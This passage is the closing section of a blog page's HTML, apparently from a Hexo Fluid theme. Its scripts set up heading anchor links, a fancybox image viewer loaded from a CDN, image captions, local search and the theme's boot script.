    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
